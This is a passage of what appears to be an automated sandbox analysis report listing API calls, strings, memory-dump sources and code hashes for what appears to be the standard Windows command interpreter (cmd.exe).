7ff7ab1476b7 22438 7ff7ab14e9b4 197 API calls 22437->22438 22440 7ff7ab1476bc longjmp 22438->22440 22439 7ff7ab1296b4 186 API calls 22439->22441 22441->22437 22441->22439 22443 7ff7ab12df93 22442->22443 22445 7ff7ab12dfe2 
Memory Dump Source
• Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
• Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
Similarity
• API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
• String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
• API String ID: 3305344409-4288247545
• Opcode ID: 5bcb5a32135a78ce5bcbb0bd87fd70d4c732013b852077ef085f129da322652b
• Instruction ID: 79d77c98f87dcad91783f6f28e59adca2d96c93fe89fa48cbd7ceb25bee9b742
• Opcode Fuzzy Hash: 5bcb5a32135a78ce5bcbb0bd87fd70d4c732013b852077ef085f129da322652b
• Instruction Fuzzy Hash: AE42DB21A0A68285EB9AAB19F4542B9E791FF4579CFC64230DD1E477F4EF3CE1588320

Control-flow Graph

• Executed
• Not Executed
Memory Dump Source
• Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
• Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
Similarity
• API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
• String ID: :$:$:$:ON$OFF
• API String ID: 972821348-467788257
• Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
• Instruction ID: 751eb7f962b7d793ba3889f909c250019c7013fee953a46f920da3de5c2b07a6
• Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
• Instruction Fuzzy Hash: 6F22B721A0A682C5EB5ABF2DF554279E691EF45B88FCA8135C90E473B4EF3DA444C370

Control-flow Graph

• Executed
• Not Executed
Memory Dump Source
• Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
• Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
Similarity
• API ID: InfoLocale$DefaultUsersetlocale
• String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
• API String ID: 1351325837-2236139042
• Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
• Instruction ID: 023e1e2112c6c82e44016d12d2dc4239781cb0b8cb1a2849af190030379c36e4
• Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
• Instruction Fuzzy Hash: 42F16C31B0A74285EA56AF1DF9502B9A7A5BF04B88FD64136CA1D473B4EF3CE509C360

Control-flow Graph

• Executed
• Not Executed
Memory Dump Source
• Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
• Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
Similarity
• API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
• String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
• API String ID: 388421343-2905461000
• Opcode ID: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
• Instruction ID: 0bd5d1676b3002ff3256b252dd1c5e4af1fdf0ab2083330a296b9113d601642a
• Opcode Fuzzy Hash: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
• Instruction Fuzzy Hash: C8F16332A0A78285E6A6AB19F4507B9F7A4FB49788F824135D94D43774EF3CE448CB20

                                                                                                          Control-flow Graph

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue$CloseOpensrandtime
                                                                                                          • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                          • API String ID: 145004033-3846321370
                                                                                                          • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                          • Instruction ID: f8a97949ae12ec7b39df0bd14b60bb671d814cd3c4b1620992e8d5cfff4043b8
                                                                                                          • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                          • Instruction Fuzzy Hash: 79E1873651EA82C6E792AB18F49457AF7A0FB88748FC15135E58E03A78EF7CD548CB10

                                                                                                          Control-flow Graph

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                          • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                          • API String ID: 2624720099-1920437939
                                                                                                          • Opcode ID: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                                                                                          • Instruction ID: 97f1c950924bc66f5b2d8f2f30aa24386a8ff562a316357f0ecf9ee52a76767a
                                                                                                          • Opcode Fuzzy Hash: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                                                                                          • Instruction Fuzzy Hash: 79C1E531E0A7428AF75ABB2CF4505B8FAA0FF4970CF965134D91E476B5EE3CA4488720

                                                                                                          Control-flow Graph

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFileFindFirstLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 873889042-0
                                                                                                          • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                          • Instruction ID: 1f9a49b581796190981ee41e3aee0d10403fa77d068c9c60447adf6263e3f43a
                                                                                                          • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                          • Instruction Fuzzy Hash: 7C515D36A0AB4686E746AF19F494179FBA1FB49B89F868131CA1E03370DF3CE554C720

                                                                                                          Control-flow Graph

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                          • Instruction ID: 349e5c97cd19fec906a0727a699801041d374d93d39797e34afd9b9f34d35c71
                                                                                                          • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                          • Instruction Fuzzy Hash: 52512C22B0A68185EAB5BF1DF54427AE650FB447A8FC64230DE6E476F0EF3CE4498350

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134D9A
                                                                                                            • Part of subcall function 00007FF7AB1358E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7AB14C6DB), ref: 00007FF7AB1358EF
                                                                                                          • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134DBB
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB134DCA
                                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134DE0
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB134DEE
                                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134E04
                                                                                                            • Part of subcall function 00007FF7AB130580: _get_osfhandle.MSVCRT ref: 00007FF7AB130589
                                                                                                            • Part of subcall function 00007FF7AB130580: SetConsoleMode.KERNELBASE ref: 00007FF7AB13059E
                                                                                                            • Part of subcall function 00007FF7AB130580: _get_osfhandle.MSVCRT ref: 00007FF7AB1305AF
                                                                                                            • Part of subcall function 00007FF7AB130580: GetConsoleMode.KERNELBASE ref: 00007FF7AB1305C5
                                                                                                            • Part of subcall function 00007FF7AB130580: _get_osfhandle.MSVCRT ref: 00007FF7AB1305EF
                                                                                                            • Part of subcall function 00007FF7AB130580: GetConsoleMode.KERNELBASE ref: 00007FF7AB130605
                                                                                                            • Part of subcall function 00007FF7AB130580: _get_osfhandle.MSVCRT ref: 00007FF7AB130632
                                                                                                            • Part of subcall function 00007FF7AB130580: SetConsoleMode.KERNELBASE ref: 00007FF7AB130647
                                                                                                            • Part of subcall function 00007FF7AB134A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A28
                                                                                                            • Part of subcall function 00007FF7AB134A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A66
                                                                                                            • Part of subcall function 00007FF7AB134A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A7D
                                                                                                            • Part of subcall function 00007FF7AB134A14: memmove.MSVCRT(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A9A
                                                                                                            • Part of subcall function 00007FF7AB134A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134AA2
                                                                                                            • Part of subcall function 00007FF7AB134AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB128798), ref: 00007FF7AB134AD6
                                                                                                            • Part of subcall function 00007FF7AB134AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB128798), ref: 00007FF7AB134AEF
                                                                                                            • Part of subcall function 00007FF7AB135554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7AB134E35), ref: 00007FF7AB1355DA
                                                                                                            • Part of subcall function 00007FF7AB135554: RegQueryValueExW.KERNELBASE ref: 00007FF7AB135623
                                                                                                            • Part of subcall function 00007FF7AB135554: RegQueryValueExW.KERNELBASE ref: 00007FF7AB135667
                                                                                                            • Part of subcall function 00007FF7AB135554: RegQueryValueExW.KERNELBASE ref: 00007FF7AB1356BE
                                                                                                            • Part of subcall function 00007FF7AB135554: RegQueryValueExW.KERNELBASE ref: 00007FF7AB135702
                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134E35
                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134E81
                                                                                                          • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134F69
                                                                                                          • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134F95
                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134FB0
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134FC1
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134FD8
                                                                                                          • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134FF8
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB135037
                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB13504B
                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB1350DF
                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB1350F2
                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB13510F
                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB135130
                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB13514A
                                                                                                          • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB135175
                                                                                                            • Part of subcall function 00007FF7AB133578: _get_osfhandle.MSVCRT ref: 00007FF7AB133584
                                                                                                            • Part of subcall function 00007FF7AB133578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB13359C
                                                                                                            • Part of subcall function 00007FF7AB133578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335C3
                                                                                                            • Part of subcall function 00007FF7AB133578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335D9
                                                                                                            • Part of subcall function 00007FF7AB133578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335ED
                                                                                                            • Part of subcall function 00007FF7AB133578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB133602
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                          • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                          • API String ID: 1049357271-3021193919
                                                                                                          • Opcode ID: 09109df7b1f92dd6c706f13a256821a2299fbe80603d920afefa709af37ce98d
                                                                                                          • Instruction ID: 4a52ef6fa0e4acf9b8350bb3d9e3f83165947311791cc8e6d66f7248e5c593ea
                                                                                                          • Opcode Fuzzy Hash: 09109df7b1f92dd6c706f13a256821a2299fbe80603d920afefa709af37ce98d
                                                                                                          • Instruction Fuzzy Hash: 76C18431A0AA42C6EA4ABB1DF854179F7A0FF49B98FC65134D90E03375EF3DA4498320

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                          • String ID: :
                                                                                                          • API String ID: 1809961153-336475711
                                                                                                          • Opcode ID: 9a6838553337d10caea9482eb8d4b87fb6c3f53a5735761c353ac2a4c5941523
                                                                                                          • Instruction ID: 9ace4cb69f23fcbb15aaca33579ab120419c80435ad67f83b6172f3893cc77ed
                                                                                                          • Opcode Fuzzy Hash: 9a6838553337d10caea9482eb8d4b87fb6c3f53a5735761c353ac2a4c5941523
                                                                                                          • Instruction Fuzzy Hash: F4D1822270AB85C1EAA6EB19F4442B9F7A0FB85744F865135D94E437B4EF3CE449CB20

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                          • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                          • API String ID: 2622545777-4197029667
                                                                                                          • Opcode ID: 9e052dd8a569df61deb78e5422594237265ab7758b060a59aba3d98d3c4be830
                                                                                                          • Instruction ID: 65450c51038dbd328c0ca5448bcab452235d59872ec484ed5fc78df8e183612b
                                                                                                          • Opcode Fuzzy Hash: 9e052dd8a569df61deb78e5422594237265ab7758b060a59aba3d98d3c4be830
                                                                                                          • Instruction Fuzzy Hash: A4919922B0A74285EE6AAB1CF8945F8A790FF48B48FC64135C54E476B5EF3CE509C760

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                          • String ID: CMD.EXE
                                                                                                          • API String ID: 1606018815-3025314500
                                                                                                          • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                          • Instruction ID: fd468a8ac3c0bd59290ead3d8ac601759793f8a8d5efaa6724b2c7ccc334a540
                                                                                                          • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                          • Instruction Fuzzy Hash: A841C131A0B602CBE70A6B1CF895278FBA0BB8A759FC69235C50E43374DF3CA4549621

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleTitlewcschr
                                                                                                          • String ID: /$:
                                                                                                          • API String ID: 2364928044-4222935259

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 4291973834-0

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                          • String ID:
                                                                                                          • API String ID: 850181435-0

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A28
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A66
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A7D
                                                                                                          • memmove.MSVCRT(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A9A
